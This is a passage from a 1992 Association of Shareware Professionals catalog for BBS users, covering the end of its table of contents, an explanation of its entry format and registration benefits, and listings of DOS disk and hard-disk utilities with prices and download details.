+ 12.6 Programming utilities . . . . . . . . . . 298 + 12.7 Software tools . . . . . . . . . . . . . . 299 + 12.7.1 For multiple programs . . . . . . . . 299 + 12.7.2 For other . . . . . . . . . . . . . . 299 + 12.8 Other . . . . . . . . . . . . . . . . . . 303 + + Chapter 13: Education 305 + 13.1 Preschool . . . . . . . . . . . . . . . . 305 + 13.2 Elementary . . . . . . . . . . . . . . . . 307 + 13.3 Junior high . . . . . . . . . . . . . . . 308 + 13.4 High school . . . . . . . . . . . . . . . 311 + 13.5 College . . . . . . . . . . . . . . . . . 312 + 13.6 Literature . . . . . . . . . . . . . . . . 315 + 13.7 Foreign language . . . . . . . . . . . . . 315 + 13.8 Computers . . . . . . . . . . . . . . . . 316 + 13.8.1 Operating system tutors . . . . . . . 318 + 13.8.2 Typing tutors . . . . . . . . . . . . 321 + 13.9 Teachers . . . . . . . . . . . . . . . . . 323 + 13.9.1 Gradebooks . . . . . . . . . . . . . 324 + 13.10 Science . . . . . . . . . . . . . . . . . 325 + 13.11 History . . . . . . . . . . . . . . . . . 326 + 13.12 Software tools . . . . . . . . . . . . . 327 + 13.12.1 For other . . . . . . . . . . . . . 327 + 13.13 Other . . . . . . . . . . . . . . . . . . 329 + + Chapter 14: Graphics 331 + 14.1 Viewing programs . . . . . . . . . . . . . 331 + 14.2 Drawing programs . . . . . . . . . . . . . 333 + 14.3 Paint programs . . . . . . . . . . . . . . 335 + 14.3.1 Graphics diversions . . . . . . . . . 336 + 14.4 Presentation graphics . . . . . . . . . . 337 + 14.5 CAD/CAM applications . . . . . . . . . . . 337 + 14.6 Business applications . . . . . . . . . . 339 + 14.6.1 OCR applications . . . . . . . . . . 340 + 14.7 File format translators . . . . . . . . . 340 + + vi + + + + 14.8 Tools & utilities . . . . . . . . . . . . 341 + 14.8.1 Screen capture . . . . . . . . . . . 341 + 14.9 Ready-made graphic images . . . . . . . . 342 + 14.9.1 Multi-format images . . . . . . . . . 342 + 14.9.2 PCX images . . . . . . . . . . . . . 342 + 14.10 Software tools . . . . . . . . . . . . . 342 + 14.10.1 For AutoCAD . . . . . . . . . . . . 342 + 14.10.2 For other . . . . . . . . . . . . . 346 + 14.11 Other . . . . . . . . . . . . . . . . . . 346 + + Chapter 15: Home & hobby 348 + 15.1 Astronomy . . . . . . . . . . . . . . . . 348 + 15.2 Collecting . . . . . . . . . . . . . . . . 348 + 15.3 Gardening . . . . . . . . . . . . . . . . 360 + 15.4 Household automation . . . . . . . . . . . 360 + 15.5 Movies & video tapes . . . . . . . . . . . 361 + 15.6 Personalities . . . . . . . . . . . . . . 364 + 15.7 Health . . . . . . . . . . . . . . . . . . 365 + 15.7.1 Food/dietary/kitchen . . . . . . . . 365 + 15.7.2 Exercise/fitness . . . . . . . . . . 367 + 15.8 Lottery . . . . . . . . . . . . . . . . . 367 + 15.9 Ham radio . . . . . . . . . . . . . . . . 370 + 15.10 Sports . . . . . . . . . . . . . . . . . 371 + 15.11 Genealogy . . . . . . . . . . . . . . . . 374 + 15.12 Music . . . . . . . . . . . . . . . . . . 375 + 15.13 Fortune telling & astrology . . . . . . . 377 + 15.14 Planes, trains & automobiles . . . . . . 381 + 15.15 Other . . . . . . . . . . . . . . . . . . 382 + + Chapter 16: Religion & philosophy 386 + 16.1 The Bible . . . . . . . . . . . . . . . . 386 + 16.1.1 Bible programs . . . . . . . . . . . 386 + 16.1.2 Bible text . . . . . . . . . . . . . 386 + 16.2 Software for houses of worship . . . . . . 386 + 16.3 New age/occult . . . . . . . . . . . . . . 388 + 16.4 Philosophy . . . . . . . . . . . . . . . . 389 + 16.4.1 Metaphysics . . . . . . . . . . . . . 389 + 16.5 Software tools . . . . . . . . . . . . . . 389 + 16.5.1 For other . . . . . . . . . . . . . . 389 + + Chapter 17: Games 390 + 17.1 Practical jokes . . . . . . . . . . . . . 390 + 17.2 Jokes & humor . . . . . . . . . . . . . . 391 + 17.3 Sayings & stories . . . . . . . . . . . . 391 + 17.4 Board games . . . . . . . . . . . . . . . 391 + 17.4.1 Mahjong . . . . . . . . . . . . . . . 391 + 17.4.2 Other . . . . . . . . . . . . . . . . 392 + 17.5 Arcade games . . . . . . . . . . . . . . . 393 + 17.6 Card games . . . . . . . . . . . . . . . . 399 + 17.6.1 Poker . . . . . . . . . . . . . . . . 401 + 17.6.2 Solitaire . . . . . . . . . . . . . . 401 + 17.7 Non-card games . . . . . . . . . . . . . . 404 + 17.8 Casino games . . . . . . . . . . . . . . . 404 + 17.9 War games . . . . . . . . . . . . . . . . 405 + + vii + + + + 17.10 Simulators . . . . . . . . . . . . . . . 405 + 17.10.1 Sports . . . . . . . . . . . . . . . 406 + 17.11 Star Trek & Star Wars . . . . . . . . . . 408 + 17.12 Trivia . . . . . . . . . . . . . . . . . 409 + 17.13 Adventure . . . . . . . . . . . . . . . . 410 + 17.14 Word games . . . . . . . . . . . . . . . 412 + 17.14.1 Cryptanalysis . . . . . . . . . . . 418 + 17.15 Pinball/paddleball . . . . . . . . . . . 418 + 17.16 Strategy/simulation . . . . . . . . . . . 418 + 17.17 Puzzles, mix & match . . . . . . . . . . 422 + 17.18 For adults . . . . . . . . . . . . . . . 422 + 17.19 Software tools . . . . . . . . . . . . . 423 + 17.19.1 For other . . . . . . . . . . . . . 423 + 17.20 Other . . . . . . . . . . . . . . . . . . 424 + + Chapter 18: About shareware 426 + 18.1 Assn. Shareware Professionals . . . . . . 426 + 18.2 Other . . . . . . . . . . . . . . . . . . 430 + + Chapter 19: Other 431 + 19.1 Software tools . . . . . . . . . . . . . . 431 + 19.1.1 For multiple programs . . . . . . . . 431 + 19.1.2 For other . . . . . . . . . . . . . . 431 + 19.2 Other . . . . . . . . . . . . . . . . . . 431 + + Appendix A: Author addresses 433 + + Appendix B: Vendor addresses 471 + + Appendix C: Bulletin Boards 491 + + Appendix D: Retired shareware 507 + + Appendix E: Sorted list of all programs 508 + + Index 525 + + ASP Catalog for BBS Users 2 + + + + + + + + ASP Shareware Catalog for BBS users + nd + 2 volume, 11 edition + Published May 1, 1992 + + Copyright 1992 by the Association of Shareware Professionals + (ASP), a non-profit organization; all rights reserved. Any + specific hardware/software names used in this catalog are the + (registered) trademarks of specific companies. Individuals, + bulletin board systems, national information systems, non-profit + organizations, and government agencies may freely distribute this + document in electronic form. For-profit disk vendor companies + may distribute this document in electronic form if they have an + ASP associate membership and if they charge only their normal + distribution fees. All others must obtain prior written per- + mission from the Association of Shareware Professionals. Write + to the ASP at 545 Grover Road, Muskegon, MI 49442. + + The programs & services described in this catalog come from + members of the Association of Shareware Professionals. This + catalog may not list every ASP-member product and it may not be + current. Send all comments about the catalog to the above + address, or to CompuServe userID 70007,4004, or as a message in + the CompuServe SHAREWARE forum. + + ASP strives to produce accurate catalogs BUT this publication may + contain any number of typographical, graphical, printing, or + interpretation errors. + + "These programs are produced by members of the Associa- + tion of Shareware Professionals (ASP). ASP wants to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at 545 + Grover Road, Muskegon, MI 49442 or send a Compuserve + message via Compuserve Mail to ASP Ombuds- + man 70007,3536". The Ombudsman may be contacted by FAX + by sending to the ASP FAX number: (616) 788-2765. In + communication with the Ombudsman please include a tele- + phone number and/or FAX if available. + + Please write to the ASP at the above address if you have any + comments or questions about this catalog. + + ASP Catalog for BBS Users 3 + + + + + + Chapter 1 + How to read this catalog + + ASP members have supplied product descriptions for each shareware + application they offer. The catalog groups them by subject + matter and lists them alphabetically. If you want to know the + name/address/phone for the author of a particular program, turn + to the index and look for the program by name. You'll usually + see two page references: one describes the page where you read + about the program, the other mentions the page where you can find + information about the author (in Appendix A). Just turn to the + appropriate page and scan for the name of the program. + + The Association of Shareware Professionals does NOT rate members' + software for functionality or usefulness, nor can it attest to + the validity of any product description in this catalog. That is + for you -- the user -- to decide. Shareware, especially those + products authorized to carry the ASP logo, can be tested on a + "try before you buy" basis. If the software doesn't meet your + needs, you won't have to worry about getting a refund. (That's + the beauty of the shareware marketing concept.) + + + 1.1 Minimum requirements + + Every program description lists its computer and operating system + requirements (e.g. "IBM PC, DOS 2.0 or better"). Unless noted + otherwise, each program assumes you have a standard keyboard, + monitor, printer, and either two floppy drives or a hard disk. + And unless noted otherwise, programs written for the IBM PC + assume you have at least 512k of total installed RAM. Many pro- + grams may also need specific hardware or software such as: + + CGA monitor A video monitor capable of displaying CGA + graphics. This includes most "laptop CGA" com- + puters, plus higher resolution monitors such as + the EGA or VGA. Some of the described programs + may operate correctly with a Hercules monitor if + you use a "CGA simulator" program; consult your + video monitor manual for details. + Dual 720k drives + At least two floppy drives capable of writing at + least 720k of data per disk, or, preferably, a + hard disk (see below). + EGA monitor A video monitor capable of displaying EGA + graphics. This almost always includes VGA and + other higher-resolution monitors. CGA and + Hercules monitors won't suffice. + Hard disk A fixed-, removeable-, or network-drive device + capable of storing multiple megabytes of data. + Some programs also assume you have at least one + floppy drive in addition to the hard disk. + + ASP Catalog for BBS Users 4 + + + + Hercules monitor + A video monitor capable of displaying Hercules + graphics. CGA monitors won't suffice. + HP DeskJet A Hewlett-Packard DeskJet or compatible printer. + Some programs may require a DeskJet starting with + a specific model such as the DeskJet Plus or + having a specific feature like a RAM cartridge. + HP LaserJet A Hewlett-Packard LaserJet or compatible printer. + (HP DeskJet printers recognize most, but not all, + of the HP LaserJet command set.) Some programs + may require a LaserJet either starting with a + specific model such as the LaserJet II or having a + specific feature like the LaserJet IIIDSi. + Modem A modem. Almost all programs work with a "Hayes" + modem, specifically one able to recognize the + Hayes command set (an industry standard). A few + programs claim to work with non-Hayes modems too. + Some programs may require the modem to operate at + a specific rate of speed (e.g. "1200 baud"). + Mouse A mouse. + Network A computer hooked up a local area network (LAN) + system. Program descriptions will normally + specify the different types of LAN systems under + which they can operate. + Plotter A plotter output device. Many of the described + programs need a plotter able to recognize the HPGL + (Hewlett Packard Graphics Language) command set. + PostScript printer + A printer able to interpret the PostScript(r) + command set. Many printers (including the HP + LaserJet series) offer PostScript compatibility + via plug-in cartridges. + VGA monitor A video monitor capable of displaying VGA + graphics. This almost always includes super-VGA + and other higher-resolution monitors. CGA/EGA/ + Hercules monitors won't suffice. + SVGA monitor + A video monitor capable of displaying Super-VGA + graphics. This almost always includes higher- + resolution monitors. CGA/EGA/VGA/Hercules + monitors won't suffice. + + + 1.2 Registration benefits + + All ASP member shareware products come with certain minimum + benefits when you register. The author must acknowledge your + registration (you don't just get a canceled check) and must + provide a minimum amount of technical support for at least three + months. + + ASP Catalog for BBS Users 5 + + + + Many authors provide other registration benefits such as a + printed manual, a master disk, a year of unlimited phone support, + source code, etc. The product description will mention them when + appropriate. + + In addition, every ASP member can offer the following benefits to + registered customers: + + CompuServe + IntroPak obtain an introductory membership to the Compu- + Serve network with a $15 usage credit when you + register an ASP member's shareware product. + Shareware + Magazine get a discount when you subscribe to Shareware + Magazine. + + Many authors include this information when they acknowledge + registrations. Contact the author if you need assistance. + + Some authors add "registration reminder screens" to the shareware + version of a program as a way to gently remind people to + register. (The ASP sets ethical standards regarding it.) Almost + all authors will either send a copy of the program without + reminder screens, or will disclose a method to disable the + reminders, once you register the product. + + + 1.3 Sample product description + + This sample description will help you understand what each field + means: + + Product: Shareware Program Name [***] + A "[***]" across from the product name indicates a new or + updated description since the last catalog. + Author: name & phone number of the person or company offering + this product. See Appendix A for detailed information about + the person or company. + Needs: computer type [IBM PC, IBM 80386, MacIntosh, etc.], + operating system, and version number. May also describe other + needed or optional hardware & software. See above for more + details. + Registration: The cost of a single user license, expressed in + U.S. currency unless otherwise noted. Many authors provide + "multi-tier" registrations, and you may pay a little more or + less than the amount stated here depending on your situation. + (You can sometimes save money by "reading the fine print.") + Some authors don't include shipping & handling fees in their + prices. Most authors offer network, site, and corporate + + ASP Catalog for BBS Users 6 + + + + licenses; please contact the author for specific details and + price quotes. + Registration benefits: Describes the benefits you get for regis- + tering the software. All ASP shareware programs come with cer- + tain minimum benefits (see above for details). + Version: version number (release date) + Look for: FILENAME.EXT (call xxx-xxx-xxxx to download it at no + charge); FNAME.EXT in GATE:FORUM forum LIB 9 on CompuServe; + FILENAME.EXT in ROUNDTABLE RTC LIB 9 on GEnie. + Download size: the size of the file(s) to download, in + kilobytes. A 2400 baud modem can download about 14 kilobytes + per minute under normal conditions. + Special instructions: tells if the author limits product + distribution to the United States. In some cases the author or + company may have signed a contract forbidding worldwide share- + ware distribution. In other cases the product may only appeal + to an American audience (income tax software for example). In + rare cases, U.S. federal laws may actually prohibit the author + or company from distributing the product in other countries. + Description: a paragraph or two of text which describes the + shareware product in detail. This information comes direct + from the author or company behind the program. + Editor's note: the catalog editor may append text of his own if + something needs further explanation. + + Chapter 2, "Utilities" 7 + + + + + + Chapter 2 + Utilities + + + 2.1 Disk utilities + + Product: Directory Freedom + Needs: IBM PC, DOS 3.0 or better. + Author: Bit Masons Consulting, 508-898-3321 + Registration: $20.00 + Registration benefits: Minimum 90 days phone/BBS/mail support. + Printed manuals, disks, and software subscription services + available for higher fees. + Version: 4.50 (12-05-91) + User benefits: Minimum 90 days phone/BBS/mail support. Printed + manuals, disks, and software subscription services available + for higher fees. + Look for: DF400.ZIP on BBSs (call 508-875-3618 to download it at + no charge); DF450.ZIP in IBMSYS forum LIB 5 on CompuServe. + Download size: 190k + Description: + Offers a fast, compact alternative to DOS Shells which provides + features such as selective file and directory operations; a + scrollable environment for examining files and directories; and + user-defined keys which can operate upon highlighted files. All + this in a program less than 25KB in size since it is written in + assembler! Easily customized through an external configuration + program. A great companion for systems of any size. + + Product: Duplicate File Manager + Needs: IBM PC, DOS 3.0 or better. + Author: Micro System Solutions, 303-795-7653 + Registration: $27.00 + Registration benefits: Printed manual, phone support. + Version: 3.0 (09-01-91) + User benefits: Printed manual, phone support. + Look for: CUDUP3.EXE on BBSs (call 617-354-8873 to download it at + no charge); CUDUP3.EXE in IBMSYS forum LIB 6 on CompuServe. + Download size: 100k + Description: + Reads all files on up to 8 requested drives, optionally + includes files contained in compression libraries (ZIP, LHA, + LHARC, PAK, ZOO, ARC, MD, etc.) Provides full list, viewing and + file deletion capabilities. Duplicates listed as equals in + filename only, filename plus equals in any of the following: + size, date or time. + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 117. + + Chapter 2, "Utilities" 8 + + + + Product: FOURU + Needs: IBM PC, DOS 3.3 or better. EGA monitor. + Author: GTX Software, 213-257-2704 + Registration: $20.00 + Registration benefits: Free upgrades for one year. + Version: 2.0 (07-01-91) + User benefits: Free upgrades for one year. + Look for: FOURU.ZIP (multiple files) on BBSs (call 414-789-4532 + to download it at no charge); FOURU.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 70k + Description: + Four Handy Utilities for your system. + DD.EXE A quick color coded directory lister. + FTREE.EXE Shows size of directories on your hard disk. + TO.EXE Change Drive/Directory quickly. + DFL.EXE Duplicate file finder. + + Product: Mover + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 2.11 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: MOVED211.ZIP on BBSs; MOVED2.ZIP in IBMSYS forum LIB 6 + on CompuServe. + Download size: 19k + Description: + Moves files between directories or disks. Fast, simple & + intuitive. Makes organizing your hard disk a snap. Options to + overwrite existing target files without asking, to delete + source files & to securely overwrite deleted source files. Much + faster than copying-then-deleting files. Works even on full + disks. + + Product: PC-INFO + Displays snapshot of system HW, SW & mem.dev. See full + description on page 76. + + Product: Room + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 2.11 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: ROOMD211.ZIP on BBSs; ROOMD2.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 8k + Description: + Tells much space is left on a disk & if there's room for a + specified set of files. Much faster & without the disk + thrashing of the DOS CHKDSK program. Find out how close you + + Chapter 2, "Utilities" 9 + + + + are to filling up your disk. Use Room in a batch file to find + out if there's enough space on the disk before trying to copy + files on it. Room takes into account existing files by the + same name on the disk. + + Product: SAFEPACK [***] + Needs: IBM PC, DOS 2.0 or better. + Author: D J Harvey Software + Registration: $15.50 + Registration benefits: Next upgrade, two years of support. + Version: 1.2 (04-02-92) + User benefits: Next upgrade, two years of support. + Look for: SAFPAK12.ZIP on BBSs; SAFPAK.ZIP in IBMHW forum LIB 1 + on CompuServe. + Download size: 55k + Description: + This disk defragmenter for MSDOS up to 5.0 and DR DOS up to 6.0 + is designed so that the data on the disk should be immune to + any interruptions to the program, whether due to user + interrupt, machine failure, or even a power cut. + + Numerous options allow files and directories to be sorted into + almost any order, and many other optimizations are possible. It + may be run in unattended mode, allowing use in batch files. As + it uses only high level calls, it should work on ANY standard + DOS Disk. + + Product: Snooper, the system checker [***] + Fast, friendly, flexible system info utility. See full + description on page 76. + + 2.1.1 Disk cataloging + + Product: Disk Manager (CUDM) + Needs: IBM PC, DOS 3.0 or better. + Author: Micro System Solutions, 303-795-7653 + Registration: $47.00 + Registration benefits: Printed manual, master disks, phone + support. + Version: 3.30 (08-01-91) + User benefits: Printed manual, master disks, phone support. + Look for: CUDM32.EXE on BBSs (call 617-354-8873 to download it at + no charge); CUDM32.EXE in IBMSYS forum LIB 9 on CompuServe. + Download size: 118k + Description: + Reads all sizes of disks (Floppies, Hard drives & CD-ROMs), + creates an on-disk catalog for your later use to find, list or + label your diskettes. Will produce labels for 5.25" or 3.5" + diskettes and listings in 3 formats. Support any display mode. + Will catalog over 50,000 files and will read compression + libraries such as .ZIP, .ARC, .LZH (both versions), .PAK, .LBR, + .ZOO, .MD and at your command will include them in your + catalog. + + Chapter 2, "Utilities" 10 + + + + Product: DISKLIST [***] + Diskette Cover & Label Producer - 39 Formats. See full + description on page 23. + + Product: DiZk4D + Needs: IBM PC, DOS 2.1 or better. 4DOS, IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 3.03 (11-18-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: DZK4D303.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DIZK4D.ZIP in PCVENB forum LIB 10 on CompuServe. + Download size: 166k + Description: + The FIRST dizk catalog and labeling system created expressly + for 4DOS. Reads the dizk, lets you add a title, dizk number, + code, and 2 lines of remarks THEN you can add or update field + descriptions for each file! You can even choose to omit files + from the catalog. You can update the dizk files and transfer + descriptions. Prints 3 sizes and 2 styles of labels, listings, + catalogs, AND a complete files list. All print outs can be + sent to file. Performs searches on all fields or combination of + fields. + + Product: FBNCAT + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk, one + floppy drive. + Author: FBN Software, 408-446-9039 + Registration: $25.00 + Registration benefits: Printed manual and most current version on + disk, Free support via CIS, GEnie, mail. + Version: 3.0 (11-01-90) + User benefits: Printed manual and most current version on disk, + Free support via CIS, GEnie, mail. + Look for: FBNCT3.EXE on BBSs; FBNCT3.EXE in IBMSYS forum LIB 9 on + CompuServe. + Download size: 154k + Description: + This disk catalog manager uses pull down menus and is fast and + simple to use. The user interface and easy of use is a major + strength of this program. Provides mouse support, configurable + printer support, ARC-ZIP-PAK-LZH archive support, prints labels + on dot matrix printers. + + Product: LJ-SLEEVE + Print floppy storage sleeves on laserjets. See full + description on page 58. + + Chapter 2, "Utilities" 11 + + + + Product: OMNIDiZk + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 2.90 (11-25-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: ODIZK290.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODIZK.ZIP in IBMSYS forum LIB 9 on CompuServe. + Download size: 142k + Description: + A complete dizk catalog and labeling system. Reads a dizk, + lets you add a title, dizk number, code, and 2 lines of remarks + THEN you can add a description to each file! You can even + choose to omit files from the catalog. You can update the dizk + files and transfer descriptions. Prints 3 sizes and 2 styles of + labels, listings, catalogs, AND a complete files list. All + print outs can be sent to file. Performs searches on all + fields or combination of fields. + + Product: PixFolio Image Catalog System + Needs: IBM AT (80286), Windows 3.0 or better. 256-color video + card and a video driver to display 256-color images. + Author: ACK Software, 502-955-7527 + Registration: $25.00 + Registration benefits: Phone & CompuServe support; free upgrade + to next major version. + Version: 1.03.6 (01-24-92) + User benefits: Phone & CompuServe support; free upgrade to next + major version. + Look for: PIXF13.ZIP on BBSs; PIXF13.ZIP in WINADV forum LIB 0 on + CompuServe. + Download size: 400k + Description: + Enables the user to maintain catalogs of the locations of + various graphics files. File formats supported include BMP, + PCX, GIF TIF, TGA, IFF/LBM, IMG, MAC, IMF, ICO/ICN Micrografx + DRW and EPS. Files can be saved in BMP, PCX, GIF, TGA, TIF and + IFF formats. + + Image manipulation tools include: rotate, mirror/flip, resize, + crop, cut & paste, palette matching, dithering print and adjust + brightness & contrast. Image catalogs can be searched for + user-supplied keywords or other criteria. + + 2.1.2 Hard disk utilities + + Product: ActaeOn + Hard Disk Manager. See full description on page 108. + + Chapter 2, "Utilities" 12 + + + + Product: BCS Menu Program + Bristol Computing Professional Menu System. See full + description on page 99. + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 112. + + Product: DaMenu + Needs: IBM PC, DOS 3.3 or better. Hard disk, EGA monitor. + Author: Just-In-Time Computing Services, 607-257-6517 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe support. + Version: 1.1 (04-02-92) + User benefits: Master disks, phone/CompuServe support. + Look for: DAMENU11.EX on BBSs (call 607-533-7072 to download it + at no charge); DMENU1.EXE in IBMSYS forum LIB 5 on CompuServe. + Download size: 130k + Description: + An easy to use, intuitive DOS menu system for novices and + advanced users! Increases your productivity and features: + * No memory overhead, not memory resident + * Mouse Support + * Network Compatible + * Built-in screen saver with user selectable delay + * Password protection for applications & 'Exit to DOS' + * File passing/command line option + * Easy menu modification + * Up to 9 menus and a total of 72 applications + + Product: DIRECT MAINT + Needs: IBM PC, DOS 2.1 or better. Hard disk, 380k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $29.95 + Registration benefits: Printed manual, phone support, one free + upgrade. + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support, one free upgrade. + Look for: availability unknown on BBSs; DIRCMA.ZIP in IBMSYS + forum LIB 5 on CompuServe; DIRCMAIN.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 286k + Description: + Tame your hard disk and forget DOS with this directory and file + manager. Formatted directory and file display, point & shoot + menus for copy, move, compare, erase all, selected or marked + files. Change file names, dates, times, attributes. Run + programs with the stroke of a key. Easily locate & erase + inactive and duplicate files to save precious disk space. View + two disks or two directories on same disk on same screen at the + same time, find any file on any disk quickly, and much, much, + more. + + Chapter 2, "Utilities" 13 + + + + Product: Director + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 2.03 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: DIRED203.ZIP on BBSs; DIRED2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 15k + Description: + Fast, easy way to display or record your disk directory + structure. You can use the data to rebuild your disk after a + crash, or to set up new systems with similar structure. + + Product: DIREDIT + File/Directory listing and sorting utility. See full + description on page 109. + + Product: Disk Manager (CUDM) + Disk Catalog system. See full description on page 9. + + Product: Disk OrGanizer (DOG) + Needs: IBM PC, DOS 2.11 or better. EMS memory may be needed for + very large hard disks. + Author: Soft GAM's Software, 707-961-1632 + Registration: $30.00 + Registration benefits: Printed manual, master disks. + Version: 3.14 (08-18-91) + User benefits: Printed manual, master disks. + Look for: DOG314.ZIP on BBSs (call 707-778-8944 to download it at + no charge); DOG.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 40k + Description: + This file defragmentation utility will improve the the speed + that files can be read from and written to a disk. Can also + recover some disk space by "freeing" space that directories are + no longer using. Can recover from a power failure and has many + features to improve safety and speed. + + Product: DOS Extensions for Professional + Needs: IBM PC, DOS 3.0 or better. + Author: Allison Software, 412-727-2198 + Registration: $59.00 + Registration benefits: Printed manual, latest version, reduced + price updates as available. + Version: 1.1 (09-02-91) + User benefits: Printed manual, latest version, reduced price + updates as available. + Look for: availability unknown on BBSs. + Download size: 274k + Description: + DIFF Highlights differences between file versions. + + Chapter 2, "Utilities" 14 + + + + DUMP Displays binary files, dirs, sectors, FAT's, & + cluster chains. + SEARCH Quickly finds files anywhere by contents. + SPLIT Breaks large files into pieces by four methods. + SUB Replaces chars, tabs, and spaces in text files. + A flexible script generator. + XDEL Performs tree deletes on files and dirs, + overwriting for security. + XDIR Lists, finds, totals, and sorts files & trees. + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 26. + + Product: EDDY (EDit DirectorY) + Needs: IBM PC, DOS 2.0 or better. + Author: John Scofield + Registration: $20.00 + Registration benefits: Technical support, free upgrade. + Version: 6b2 (01-04-92) + User benefits: Technical support, free upgrade. + Look for: EDDY6B*.ZIP on BBSs (call 215-678-9334 to download it + at no charge); EDDY6B.ZIP in CLMFORUM forum LIB 4 on + CompuServe. + Download size: 200k + Description: + * Full-screen directory editor + * Disk & directory manager + * Backup & recovery utility + * File finder, viewer & patcher + * Hex/text string finder & replacer + * Sector editor, RAM editor + * Powerful DOS shell + ...and MUCH more! + + "Computer Language" says: + "The interface ... is elegant." + "...clean, easy-to-use, well-written program." + "...quality of product we've seen from Peter Norton." + + Chapter 2, "Utilities" 15 + + + + Product: FILE-MAN + Needs: IBM PC, DOS 3.0 or better. + Author: Micrometric, 813-377-2515 + Registration: $30.00 + Registration benefits: Printed & bound 7'x8.5' manual, one yr. + phone/mail support, next release notification. + Version: 4.21 (05-24-91) + User benefits: Printed & bound 7'x8.5' manual, one yr. phone/mail + support, next release notification. + Look for: FILE@421.ZIP on BBSs. + Download size: 194k + Description: + A menu driven utility program that aids in managing disk files. + Directory and file names are displayed in sorted order with + file names sorted by name, extension, date or size. Single + files or groups may be quickly marked and then acted upon. The + actions include copy, move, spawn, append, erase, rename, + change attribute status, display, print and locate. Features + include context sensitive help, macro procedures, directory + tree, diskette labels and program parameter customization. + + Product: FLEXIBAK Plus + Flexible Hard Disk Backup System. See full description on + page 30. + + Product: Globally + Executes commands/programs in multiple dirs. See full + description on page 79. + + Product: Globally/2 + Executes commands/programs in multiple dirs. See full + description on page 79. + + Product: HandyDOS + Needs: IBM PC, DOS 2.0 or better. + Author: Abri TEchnologies, Inc. + Registration: $25.00 + Registration benefits: Three months support. + Version: 1.2 (02-27-92) + User benefits: Three months support. + Look for: availability unknown on BBSs; HDOS.EXE in IBMSYS forum + LIB 3 on CompuServe. + Download size: 74k + Description: + A set of several most wanted utilites: + BAK can delete all *.bak and NULL files from disk or + directory. + MV can move files or whole directories around disk. + D changes directories by simple number reference. + DELTREE deletes whole unwanted directory. + ...and other handy utilities. + + Chapter 2, "Utilities" 16 + + + + Product: Hard at Work + You take a break while the computer "works" See full + description on page 390. + + Product: Hard Disk Director + Hard Disk Menu and Shell. See full description on page 112. + + Product: HDTEST + Needs: IBM PC, DOS 2.0 or better. 312k RAM. + Author: Computer Counselors, Inc., 215-527-4408 + Registration: $35.00 + Registration benefits: Latest version of program on disk. + Telephone and mail support. Notice of upgrades, bug fixes, etc. + Version: 5.35a (10-20-91) + User benefits: Latest version of program on disk. Telephone and + mail support. Notice of upgrades, bug fixes, etc. + Look for: availability unknown on BBSs; HDTEST.ZIP in IBMHW forum + LIB 1 on CompuServe. + Download size: 142k + Description: + Allows thorough READ/WRITE testing of a hard disk partition or + floppy disk without disturbing data on the disk. Data from a + problem area is moved to a known good area, and the disk's FAT + and directory entries are adjusted to preserve the structure of + the file of which it is a part. Recognizes and tests large + partitions created by MS/PC DOS 4.xx or 5.xx, as well as + proprietary partitions created by SpeedStor or Disk Manager. + + Product: Instant Access Menu System [***] + Easy, colorful interface for running programs. See full + description on page 103. + + Product: JDIR + Needs: IBM PC, DOS 3.0 or better. + Author: Cybernetic Software, 708-677-8358 + Registration: $10.00 + Registration benefits: Master disks, source code. + Version: 1.1 (01-11-90) + User benefits: Master disks, source code. + Look for: JDIR11.ZIP on BBSs (call 312-764-0591 to download it at + no charge). + Download size: 8k + Description: + Provides an alphabetical directory list in 4 columns. File + attributes are displayed instead of the time and date stamp. If + there are more files than can be fit on one screen, the program + will automatically pause at the end of each screen. + + Chapter 2, "Utilities" 17 + + + + Product: LCD: Led's Change Directory + Needs: IBM PC, DOS 3.3 or better. + Author: Keith Ledbetter, 804-674-0780 + Registration: $15.00 + Registration benefits: Registered users receive a BRAND utility + to embed their name into future upgrades and free voice + support. + Version: 3.1a (05-06-91) + User benefits: Registered users receive a BRAND utility to embed + their name into future upgrades and free voice support. + Look for: LCD_31A.ZIP on BBSs (call 804-790-1675 to download it + at no charge); LCD31A.ZIP in IBMSYS forum LIB 6 on CompuServe; + LCD_31A.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 30k + Description: + Voted by the Public (software) Library publication as one of + "the 10 best utilities of 1990". Helps you quickly and easily + change between subdirectories on your hard drives. Supports + "fuzzy matching" logic. Can even act as a total replacement + for DOS's CD, RD, and MD commands. Fully supports EGA/VGA 43 + and 50 line screen modes. Stop typing commands like "CD + \PCPLUS\DOWNLOAD\NEW"; it's as simple as "LCD NEW"! Network + aware; supports up to 4,000 